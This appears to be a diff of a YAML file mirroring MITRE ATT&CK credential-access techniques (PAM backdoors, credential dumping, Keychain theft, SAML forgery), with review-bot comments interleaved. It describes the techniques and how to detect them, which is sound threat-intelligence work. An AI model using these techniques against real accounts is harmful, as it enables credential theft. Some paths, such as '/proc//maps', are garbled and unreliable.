- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
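Review bot: the T1556.003 description context lines show inline-code spans split across lines (`pam_unix.so` followed by `, which retrieves ...`, and `/etc/passwd` / `and /etc/shadow` / `.(Citation: ...)`), which looks like the generator stripping backticks and inserting newlines around code spans. This is pre-existing rather than introduced here, but since the patch regenerates the whole object it is the natural place to fix the description sanitizer so the sentence survives on one line.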
@@ -43662,20 +44287,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
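Review bot: `x_mitre_permissions_required: [root]` is deleted from T1556.003 and nothing in the rewritten object carries the root requirement; if the intent is to follow an upstream removal of that field, note it in the commit message, otherwise keep it, because consumers that filter techniques by required privilege lose the information silently. Separately, most of the added lines in this hunk are the same keys as the removed ones moved to a different position (`x_mitre_contributors`, `x_mitre_domains`, `x_mitre_platforms`, `external_references`, `type`, `id`, `created`); emitting keys in a fixed sorted order from the generator would keep future upstream refreshes reviewable.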
@@ -43755,12 +44417,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43789,6 +44450,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -43800,18 +44462,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43838,14 +44500,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
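Review bot: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are removed from the bottom of T1110.001 here and re-added in the middle of the object in the two preceding hunks, a pure reorder with no value change. Other objects in this patch (T1003.002, T1552.005) keep those keys at the bottom, so the generator is serializing keys in two different orders and the diff is larger than the real change; sort keys before serializing to remove the noise.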
@@ -43969,12 +44628,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43989,10 +44647,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -44000,14 +44659,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -44050,14 +44709,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -44112,14 +44768,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44170,14 +44825,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44211,8 +44865,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -44229,11 +44883,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -44251,7 +44904,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -44268,10 +44921,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -44295,46 +44948,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
@@ -44355,65 +44974,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44422,6 +45038,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44429,31 +45048,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
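Review bot: `x_mitre_permissions_required: [SYSTEM]` is dropped from T1003.004 as well; here the requirement at least survives in the description (`Adversaries with SYSTEM access to a host ...`), but consumers reading the field still lose it, so the same question as for T1556.003 applies. Also, the `Tilbury Windows Credentials` reference title is re-emitted with a stray leading digit (`1Windows Credentials: Attack, Mitigation, Defense`); it was in the removed line too, so it comes from upstream, but it is worth checking before it is carried forward again.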
@@ -44466,14 +45117,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -44514,14 +45165,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
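Review bot: the T1003.007 description context line reads `/proc//maps` and `/proc//mem`, i.e. the `<pid>` placeholder has been stripped, presumably by the same sanitizer that removes angle-bracket markup. This is pre-existing, but it turns a correct path into a wrong one, so the sanitizer should escape rather than drop `<...>` tokens that sit inside code spans.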
@@ -44584,81 +45232,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
